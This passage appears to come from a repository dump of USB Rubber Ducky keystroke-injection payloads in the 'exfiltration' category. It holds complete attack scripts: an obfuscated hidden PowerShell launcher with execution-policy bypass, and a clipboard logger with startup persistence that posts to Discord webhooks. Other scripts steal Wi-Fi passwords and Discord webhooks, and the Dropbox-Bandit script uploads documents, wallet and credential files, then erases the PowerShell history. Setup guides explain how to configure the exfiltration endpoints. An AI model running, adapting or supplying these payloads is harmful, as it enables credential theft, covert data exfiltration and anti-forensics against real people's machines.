\"P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi\"\r\n ELSE IF ($RANDOM_PS == 4) THEN\r\n STRING cmd /c \"FOR /F \"delims=s\\ t%PSModulePath:~25,1%kens=4\" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H\"\r\n ELSE IF ($RANDOM_PS == 5) THEN\r\n STRING cmd /c \"Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi\"\r\n ELSE IF ($RANDOM_PS == 6) THEN\r\n STRING cmd /c \"p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD\"\r\n ELSE IF ($RANDOM_PS == 7) THEN\r\n STRING cmd.exe /c \"P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi\"\r\n ELSE IF ($RANDOM_PS == 8) THEN\r\n STRING powershell -NoPro -noninT -win h\r\n ELSE IF ($RANDOM_PS == 9) THEN\r\n STRING cmd /c \"p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD\"\r\n ELSE IF ($RANDOM_PS == 2) THEN\r\n STRING powershell.exe -NoP -nOni -W h\r\n ELSE IF ($RANDOM_PS == 10) THEN\r\n STRING cmd /c \"FOR /F \"delims=s\\ tokens=4\" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H\"\r\n ELSE IF ($RANDOM_PS == 11) THEN\r\n STRING powershell -nopr -noninT -W HiddEn\r\n ELSE IF ($RANDOM_PS == 12) THEN\r\n STRING cmd.exe /c \"FOR /F \"delims=s\\ tokens=4\" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi\"\r\n ELSE IF ($RANDOM_PS == 13) THEN\r\n STRING cmd /c \"P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h\"\r\n ELSE IF ($RANDOM_PS == 14) THEN\r\n STRING powershell -noproF -noni -W Hi\r\n ELSE IF ($RANDOM_PS == 15) THEN\r\n STRING cmd /c \"Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi\"\r\n ELSE ($RANDOM_PS == 16) THEN\r\n STRING powershell.exe -noP -nOnI -windo H\r\n END_IF\r\n\r\n\r\n IF_DEFINED_TRUE #EXECUTIONPOLICY\r\n SPACE\r\n IF (($RANDOM_PS % 2) == 0) THEN\r\n STRING -ep ByPasS\r\n ELSE IF (($RANDOM_PS % 5) == 0) THEN\r\n STRING -exec bypass\r\n ELSE IF (($RANDOM_PS % 7) == 0) THEN\r\n STRING -exeC byPasS\r\n ELSE IF (($RANDOM_PS % 10) == 0) THEN\r\n STRING -exEcUtionPoL bYpaSs\r\n ELSE IF (($RANDOM_PS % 12) == 0) THEN\r\n STRING -exEcUtion bYPaSs\r\n ELSE\r\n STRING -eP BYPaSs\r\n END_IF\r\n END_IF_DEFINED\r\n ENTER\r\n DELAY #DELAY\r\n END_FUNCTION\r\n REM EXAMPLE USAGE AFTER EXTENSION\r\n REM DELAY 2000\r\n REM GUI r\r\n REM DELAY 2000\r\n REM Rolling_Powershell_Execution()\r\nEND_EXTENSION\r\n\r\nEXTENSION Detect_Finished\r\n REM VERSION 1.0\r\n REM AUTHOR: 0i41E\r\n\r\n REM_BLOCK DOCUMENTATION\r\n USAGE:\r\n Use the function Detect_Finished() to signal the finished execution of your payload.\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #PAUSE 150\r\n FUNCTION Detect_Finished()\r\n IF ($_CAPSLOCK_ON == FALSE)\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n ATTACKMODE OFF\r\n ELSE IF\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n ATTACKMODE OFF\r\n END_IF\r\n END_FUNCTION\r\nEND_EXTENSION\r\n\r\n\r\nREM Define URL of your catching webhook\r\nDEFINE #HOOK \"https://example.com/\"\r\nREM Define the pause between calls to your webhook. \r\nDEFINE #CALLBACK_DELAY 12\r\n\r\nIF ($_OS == WINDOWS) THEN\r\n GUI r\r\n DELAY 1000\r\n REM randomized and obfuscated way to start powershell\r\n Rolling_Powershell_Execution()\r\n STRINGLN_POWERSHELL\r\n $e = $null\r\n while ($true) \r\n {\r\n $c = Get-Clipboard\r\n if ($c) \r\n {\r\n if ($c -ne $e)\r\n {\r\n $o = \"Clipboard content: $c\"\r\n irm -Uri #HOOK -Method POST -Body $o\r\n } else \r\n {\r\n $o = \"Clipboard content hasn't changed\"\r\n irm -Uri #HOOK -Method POST -Body $o\r\n }\r\n $e = $c\r\n } else \r\n {\r\n $o = \"Clipboard is empty\"\r\n irm -Uri #HOOK -Method POST -Body $o\r\n }\r\n sleep -s #CALLBACK_DELAY\r\n }\r\n END_STRINGLN\r\n ENTER\r\n DELAY 250\r\n Detect_Finished()\r\nELSE\r\n ATTACKMODE OFF\r\nEND_IF\r\n\r\n\r\n\r\n\r\n\r\n" }, { "path": "payloads/library/exfiltration/Copy-And-Waste/I.bat", "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n" }, { "path": "payloads/library/exfiltration/Copy-And-Waste/README.md", "content": "\n\n

\n \n \n \n

\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Copy-And-Waste\n\nA payload to exfiltrate clipboard contents\n\n## Description\n\nThis payload uses iwr to download 2 files \n* I.bat\n* c.ps1\n\n**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, waiting for a Ctrl + C or Ctrl + X click \n\nThen the contents will then be sent to the discord webhook for viewing pleasure\n\nFor killing the script press both Ctrl buttons at the same time [It will resume at reboot]\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Discord webhook or other webhook service\n* Windows 10,11\n* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks \n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec) &\n[I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

📱 My Socials 📱

\n
\n\n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Jsonnet\"\n \n
I-Am-Jakoby's Discord\n
\n
\n\n

(back to top)

\n\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n

(back to top)

\n" }, { "path": "payloads/library/exfiltration/Copy-And-Waste/c.ps1", "content": "Add-Type -AssemblyName WindowsBase\r\nAdd-Type -AssemblyName PresentationCore\r\n\r\nfunction dischat {\r\n\r\n [CmdletBinding()]\r\n param ( \r\n [Parameter (Position=0,Mandatory = $True)]\r\n [string]$con\r\n ) \r\n \r\n $hookUrl = 'YOUR DISCORD WEBHOOK'\r\n \r\n$Body = @{\r\n 'username' = $env:username\r\n 'content' = $con\r\n}\r\n\r\n\r\nInvoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body\r\n\r\n}\r\n\r\n\r\ndischat (get-clipboard)\r\n\r\nwhile (1){\r\n $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')\r\n $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)\r\n $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)\r\n $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)\r\n\r\n if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}\r\n elseif ($Rctrl -and $Lctrl) {dischat \"---------connection lost----------\";exit}\r\n else {continue}\r\n} " }, { "path": "payloads/library/exfiltration/Copy-And-Waste/payload.txt", "content": "REM Title: Copy-And-Waste\r\n\r\nREM Author: atomiczsec & I am Jakoby\r\n\r\nREM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook\r\n\r\nREM Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI\r\nDELAY\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\n\r\nREM Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM Also remember to put in your discord webhook in c.ps1\r\nREM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH\r\n" }, { "path": "payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md", "content": "# Create And Exfiltrate A Webhook Of Discord\n\nThis script allows you to create a Webhook of a Discord server quickly and exfiltrate it. For demonstration purposes another Discord webhook was used for exfiltration but of course any method you prefer can be used.\n\n**Category**: Exfiltration\n\n## Description\n\nThis script allows you to create a Webhook of a Discord server quickly and exfiltrate it. For demonstration purposes another Discord webhook was used for exfiltration but of course any method you prefer can be used.\n\nFirst of all open Discord trough Windows GUI, the open time may vary depending on the pc and whether there may be updates that need to be done. When it is open, search the server using a Discord keyboard shortcut *\\, then go to first channel and open the settings using TABx11, then go to Integration settings using TABx6 and DOWN_ARROWx3, then create a Webhook (Because it may happen that there is still not even one) and copy the first reachable, then close Discord.\n\nTo do the exfiltration I decided to use another discord webhook but of course you can use whatever exfiltration method you prefer.\n\n**Stealing a Discord webhook without authorization is considered a cybercrime**. Acquiring a webhook without proper permission is a violation of digital security and can be subject to legal consequences.\n\n## Dependencies\n\n* Discord Installed\n* Internet connection\n\n## Settings\n\n- You must define the Discord server name i.e. Hak5\n\n `DEFINE #SERVER_NAME example`\n\n- You must define your Dropbox accessToken or modify the exfiltration modality.\n\n `DEFINE #DISCORD_WEBHOOK example`\n\n- The open time may vary depending on the pc and whether there may be updates that need to be done\n \n `DELAY 6000`\n \n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt", "content": "REM_BLOCK\n###############################################################\n# #\n# Title : Create And Exfiltrate A Webhook Of Discord #\n# Author : Aleff #\n# Version : 1.0 #\n# Category : Exfiltration #\n# Target : Windows 10-11 #\n# #\n###############################################################\nEND_REM\n\n\nREM Requirements:\nREM - Internet connection\nREM - Discord Installed\n\nREM You must define the Discord server name i.e. Hak5\nDEFINE #SERVER_NAME example\n\nREM You must define your Discord webhook if you want to use this method for the exfiltration\nDEFINE #DISCORD_WEBHOOK example\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\nREM Open Discord app\nGUI\nDELAY 1000\nSTRING Discord\nENTER\n\nREM It depends\nDELAY 6000\n\nREM Search by Discord keyboard shortcut and open it\nCTRL k\nDELAY 500\nSTRINGLN *#SERVER_NAME\nDELAY 500\n\nREM Go to first channel and open the settings\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\nDELAY 500\n\nREM Open Integrations section\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nDOWNARROW\nDELAY 500\nDOWNARROW\nDELAY 500\nDOWNARROW\nDELAY 500\nENTER\nDELAY 500\n\nREM Webhooks settings\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM Create Webhook\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\nDELAY 500\n\nREM Select first Webhook\nTAB\nDELAY 500\nENTER\nDELAY 500\n\nREM Copy Webhook\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nSPACE\nDELAY 500\n\nREM Close Discord\nALT F4\n\nREM Open a PowerShell\nDELAY 500\nGUI r\nDELAY 500\nSTRING powershell\nDELAY 500\nENTER\nDELAY 2000\n\nREM Exfiltration using Discord Webhook\nSTRINGLN $WebhookUrl = \"#DISCORD_WEBHOOK\"\n\nSTRING $Payload = @{content = \"\nCTRL v\nSTRINGLN \"} | ConvertTo-Json\n\nSTRINGLN Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'; exit;\n" }, { "path": "payloads/library/exfiltration/DUCKY-WIFI_GRABER/payload.txt", "content": "REM Title: Ducky WiFi Grabber\nREM Description: Steals wifi passwords and sends them to your outlook email\nREM Author: Zero_Sploit\nREM Props: Hak5 Team\nREM Version: 1.0\nREM Category: Exfiltration\nREM Target: Windows 10 (CMD + Powershell)\nREM Attackmodes: HID\nREM Some editing on your part is needed such as outlook email & password\nREM This script is for educational purposes only please do not use this for malicious purposes\nREM Open Cmd\nDELAY 1000\nWINDOWS r\nDELAY 500\nSTRING cmd\nENTER\nDELAY 200\nREM Get all SSID\nSTRING cd %USERPROFILE% & netsh wlan show profiles | findstr \"All\" > a.txt\nENTER\nREM Create a filter.bat to get all the profile names\nSTRING echo SETLOCAL EnableDelayedExpansion^\nENTER\nENTER\nSTRING for /f \"tokens=5*\" %%i in (a.txt) do (^\nENTER\nENTER\nSTRING set val=%%i %%j^\nENTER\nENTER\nSTRING if \"!val:~-1!\" == \" \" set val=!val:~0,-1!^\nENTER\nENTER\nSTRING echo !val!^>^>b.txt) > filter.bat\nENTER\nREM Run filter.bat and save all profile names in b.txt\nSTRING filter.bat\nDELAY 300\nENTER\nREM --> Save all the LOOT in Log.txt and delete the other files\nSTRING (for /f \"tokens=*\" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name=\"%i\" key=clear | findstr /c:\"Key Content\" & echo.) > Log.txt\nENTER\nDELAY 1000\nSTRING exit\nDELAY 500\nENTER\nDELAY 1000\nREM Mail Log.txt\nWINDOWS r\nDELAY 500\nSTRING powershell\nENTER\nDELAY 1000\nSTRING del .\\a.txt \nENTER\nSTRING del .\\b.txt \nENTER\nSTRING del .\\filter.bat\nENTER\nREM Email The Log.txt file\nSTRING $SMTPServer = 'smtp-mail.outlook.com'\nENTER\nSTRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)\nENTER\nSTRING $SMTPInfo.EnableSSL = $true\nENTER\nSTRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('YOUR EMAIL HERE', 'YOUR EMAIL PASSWORD HERE')\nENTER\nSTRING $ReportEmail = New-Object System.Net.Mail.MailMessage\nENTER\nSTRING $ReportEmail.From = 'YOUR EMAIL HERE'\nENTER\nSTRING $ReportEmail.To.Add('YOUR EAMIL HERE')\nENTER\nSTRING $ReportEmail.Subject = 'WiFi key grabber'\nENTER\nSTRING $ReportEmail.Body = (Get-Content Log.txt | out-string)\nENTER\nSTRING $SMTPInfo.Send($ReportEmail)\nENTER\nREM Delete Log.txt and exit\nDELAY 3000\nSTRINGLN del Log.txt\nDELAY 500\nSTRINGLN exit\nENTER\n" }, { "path": "payloads/library/exfiltration/Discord_Windows_Wifi_IP-Info/payload.txt", "content": "REM Title: Discord Windows Wifi IP-Info\nREM Description: Grabs wifi passwords, environment data, IPv4 Network addresses, writes to a file, uploads it to Discord, then cleans up the file on the targets filesystem and exits. \nREM Author: Startrk1995\nREM Props: Hak5 Team\nREM Version: 1.0\nREM Category: Exfiltration\nREM Target: Windows 10 (CMD + Powershell)\nREM Attackmodes: HID\nREM Mandatory Info: Add your Discord Webhook URL in quotes with no spaces and with permission to post.\nREM Discord URL: Example: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd\nREM Legal: This script is for educational purposes only please do not use this for malicious purposes\n\nDELAY 500\nGUI r\nDELAY 200\nSTRING powershell\nENTER\nDELAY 1000\n\nREM I have this as all one command for quickness.\n\nSTRING $url=\"YOUR DISCORD WEBHOOK\";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\\d+.\\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = \"$env:computername Stats from Ducky/Pico\"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F \"file1=@stats.txt\" $url ; Remove-Item '.\\stats.txt';exit\nENTER\n" }, { "path": "payloads/library/exfiltration/Dropbox-Bandit/ex-readable-src.ps1", "content": "# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)\n$source = $env:USERPROFILE+\"\\Documents\\*\";\n\n##############################################################################################\n# Dropbox API values: Follow read.me tutorial to get these! #\n##############################################################################################\n# refresh_token\n$refreshToken = \"REFRESH_TOKEN_HERE\";\n# App key\n$user = 'APP_KEY_HERE';\n# App secret\n$pass = 'APP_SECRET_HERE';\n\n# temp directory to copy our files to\n$dest = $env:TMP+\"\\cpy\";\n$n = 0;\n$mb = 0;\n\n# Delete the destination directory if it exists\nif(Test-Path $dest) { rm -Path $dest -Force -Recurse; }\n\n# find our files and copy them into the temp directory\nGCI $source -R -I \"*.txt\",\"*wallet*\",\"*.env\",\".x*\",\".doc*\",\"*pass*\",\"*auth*\" | % {\n $size = ((GCI $_.FullName).length/1MB);\n # ignore files that are too big\n if($size -lt 100) {\n $mb += $size;\n # once we come close to exceeding the dropbox upload limit we switch to a new folder\n if($mb -ge 100) {\n $mb = 0;\n $n++;\n }\n ROBOCOPY $_.Directory (\"$dest\\$n\\\") $_.Name /MT 128 /NJH /NJS | Out-Null;\n }\n}\n\n$creds = @{\n grant_type = \"refresh_token\";\n refresh_token = $refreshToken;\n};\n$headers = @{\n \"Authorization\" = \"Basic \"+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes(\"${user}:${pass}\"));\n \"Content-Type\" = \"application/x-www-form-urlencoded\";\n};\n$accessToken = (Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body $creds -Headers $headers).access_token;\n\nAdd-Type -AssemblyName System.IO.Compression.Filesystem;\n$d=get-date -f MM-dd-yyyy;\n$t=get-date -f HH-MM-ss;\n\n# convert our files to zip files and then upload to dropbox\nfor($i = 0; $i -le $n; $i++)\n{\n $zip = \"$env:TMP\\$env:USERNAME-$i-$t.zip\";\n [System.IO.Compression.ZipFile]::CreateFromDirectory(\"$dest\\$i\\\", $zip, 0, $false);\n $target=\"/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip\";\n $arg = '{ \"path\": \"' + $target + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }';\n $headers = @{\n \"Authorization\" = \"Bearer $accessToken\";\n \"Content-Type\" = \"application/octet-stream\";\n \"Dropbox-API-Arg\" = $arg;\n };\n Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $zip -Headers $headers | Out-Null;\n}\n\n# delete the temp directory\nrm $dest -Force -Recurse;\n# delete the zip files\nfor($i = 0; $i -le $n; $i++)\n{\n rm \"$env:TMP\\$env:USERNAME-$i-$t.zip\" -Force;\n}\n\n# hide our traces (only will delay blue team -- not totally prevent them from seeing the traces)\nClear-History;\nrm \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\*\";\nexit;" }, { "path": "payloads/library/exfiltration/Dropbox-Bandit/ex.ps1", "content": "# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)\n$s=$env:USERPROFILE+\"\\Documents\\*\";\n# filetypes to exfiltrate\n$fileTypes=\"*.txt\",\"*wallet*\",\"*.env\",\"*.x*\",\"*.doc*\",\"*pass*\",\"*auth*\";\n##############################################################################################\n# Dropbox API values: Follow read.me tutorial to get these! #\n##############################################################################################\n# refresh_token\n$r=\"REFRESH_TOKEN_HERE\";\n# App key\n$u = 'APP_KEY_HERE';\n# App secret\n$p = 'APP_SECRET_HERE';\n# do not touch below this line unless you know what you're doing\n$ds=$env:TMP+\"\\cpy\";$n = 0;$mb = 0;if(Test-Path $ds){rm $ds -Fo -R;}GCI $s -R -I $fileTypes|%{$sz = ((GCI $_.FullName).length/1MB);if($size -lt 100){$mb+=$sz;if($mb -ge 100){$mb = 0;$n++;}ROBOCOPY $_.Directory (\"$ds\\$n\\\") $_.Name /MT 128 |Out-Null;}}\n$a=(Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body @{grant_type = \"refresh_token\";refresh_token = $r;} -Headers @{\"Authorization\" = \"Basic \"+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes(\"${u}:${p}\"));\"Content-Type\" = \"application/x-www-form-urlencoded\";}).access_token;\nAdd-Type -AssemblyName System.IO.Compression.Filesystem;$d=get-date -f MM-dd-yyyy;$t=get-date -f HH-MM-ss;for($i = 0;$i -le $n;$i++){$z=\"$env:TMP\\$env:USERNAME-$i-$t.zip\";[System.IO.Compression.ZipFile]::CreateFromDirectory(\"$ds\\$i\\\",$z,0,$false);\nInvoke-RestMethod https://content.dropboxapi.com/2/files/upload -Method Post -InFile $z -Headers @{\"Authorization\"=\"Bearer $a\";\"Content-Type\"=\"application/octet-stream\";\"Dropbox-API-Arg\"=\"{`\"path`\":`\"/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip`\",`\"mode`\":`\"add`\",`\"autorename`\":true,`\"mute`\":false}\";}|Out-Null;}\nrm $ds -Fo -R;for($i = 0;$i -le $n;$i++){rm \"$env:TMP\\$env:USERNAME-$i-$t.zip\" -Fo;}Clear-History;rm \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\*\" -Fo;exit;" }, { "path": "payloads/library/exfiltration/Dropbox-Bandit/payload.txt", "content": "REM Title: Dropbox Bandit\nREM Author: Factor (github.com/Factor101)\nREM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account\nREM Target: Windows 10/11 (Powershell)\nREM Version: 1.0\nREM Category: Exfiltration\nREM Legal: This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.\n\nATTACKMODE HID\nREM Inital Delay\nDELAY 500\n\nREM Open CMD\nGUI r\nREM Delay to allow window to open\nDELAY 100\nREM Launch hidden powershell window to execute our script\n\nREM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here\nREM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0\nREM if you're using pastebin ensure you're using the \"raw\" link e.g. http://pastebin.com/raw/\nREM --------- replace me! ----------\nSTRINGLN powershell -w h -NoP -NonI -Exec Bypass \"$e=$env:TMP+'\\ex.ps1';iwr https://pastebin.com/raw/ -O $e;iex $e;rm $e\"\nDELAY 200\n\nREM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky\nCAPSLOCK\nATTACKMODE OFF" }, { "path": "payloads/library/exfiltration/Dropbox-Bandit/payload_duckyscript_old.txt", "content": "REM Title: Dropbox Bandit\nREM Author: Factor (github.com/Factor101)\nREM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account\nREM Target: Windows 10/11 (Powershell)\nREM Version: 1.0\nREM Category: Exfiltration\n\nREM Inital Delay\nDELAY 500\n\nREM Open CMD\nGUI r\nREM Delay to allow window to open\nDELAY 100\nREM Launch hidden powershell window to execute our script\n\nREM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here\nREM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0\nREM if you're using pastebin ensure you're using the \"raw\" link e.g. http://pastebin.com/raw/\nREM --------- replace me! ----------\nSTRING powershell -w h -NoP -NonI -Exec Bypass \"$e=$env:TMP+'\\ex.ps1';iwr https://pastebin.com/raw/ -O $e;iex $e;rm $e\"\nDELAY 200\nENTER\n\nREM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky\nCAPSLOCK" }, { "path": "payloads/library/exfiltration/Dropbox-Bandit/readme.md", "content": "\n# **Dropbox Bandit**\nThis payload is designed to target Windows 10/11 machines, but but may run on older versions of Windows. If you are using an older Rubber Ducky please use the \"payload_duckyscript_old.txt\" file.\n\nThis payload extracts files from a specific location on a target's machine and uploads them in archives to a dropbox account. The actual payload takes about 5 seconds to run (faster on real machines, tested on virtual machine), but the actual exfiltration, which is invisible to the victim once started, can take longer depending on the total size of data to be uploaded. \n\n**Configuration:**\n- Selects a folder (and thereby all subfolders) to extract files from\n- Select filetype(s) or filename(s) to target\n- Dropbox account to use\n\n**Payload Anatomy:**\n- The payload runs a hidden and windowless powershell window which then downloads and executes the powershell script from a url.\n- The powershell script finds all the files that match the chosen parameters and copies them to a directory in %temp%\\cpy\\0\n- Once the amount of files in the temporary directory exceeds 100mb, close to the dropbox upload size limit, the script creates a new subdirectory\n- The script obtains a token from the dropbox api to be used for uploading later, using the refresh_token (see info on how to get this token below)\n- The script archives each of our subdirectories into zip files in %temp%, named like this: `${USERNAME}-${MM-dd-yyyy}-${HH-MM-ss}.zip`\n- The script uploads each zip file to this folder on your dropbox account: `${hostname}-{USERNAME}/${MM-dd-yyyy}/`\n- The script deletes the zip files and temporary directory\n- The script deletes local powershell history and logs\n- Script exits\n\n## **Setup**\n- Create a new Dropbox account\n- [Create a new \"App\"](https://www.dropbox.com/developers/apps/create)\n-- Select \"Scoped Access\"\n-- Select \"Full Dropbox\"\n-- Name it whatever you want\n-- Go the the \"Permissions\" tab and enable \"files.content.write\", and \"files.metadata.write\"\n-- Go to the \"Settings\" tab and copy your \"App key\" and \"App secret\"\n-- Go to the \"Settings\" tab -> OAuth 2 -> Generated Access token and copy the token that you generate. **Important: This token will expire in 4 hours**, so you will only use this one to get your refresh token\n-- Enter this link in your browser: https://www.dropbox.com/oauth2/authorize?client_id=YOUR_APP_KEY_GOES_HERE&token_access_type=offline&response_type=code, but ensure you replace \"YOUR_APP_KEY_GOES_HERE\" with your app key from above\n* Click \"Continue\" and \"Allow\" and then copy the token it gives you. \n* Open a command prompt and type \"curl https://api.dropbox.com/oauth2/token -d code=THE_CODE_YOU_GOT_FROM_THE_LAST_STEP -d grant_type=authorization_code -u YOUR_APP_KEY:YOUR_APP_SECRET\". Hit enter and then copy the \"refresh_token\" from the result. This is your \"refresh_token\"\n- Now that we have all our dropbox information, download the powershell script \"ex.ps1\"\n-- Set $s to the folder you want to exfiltrate data from\n-- Set $fileTypes to the filters for what files you want to grab\n-- Set $r to your refresh token from above\n-- Set $u to your App Key\n-- Set $p to your App Secret\n-- Save the script\n- Select all the code your newly modified powershell script, and upload it to any of these:\n-- Dropbox: Upload the script as a .ps1 file and copy the download link, replacing ?dl=0 at the end with ?dl=1\n-- Pastebin: Upload the text and copy the \"raw\" version of the 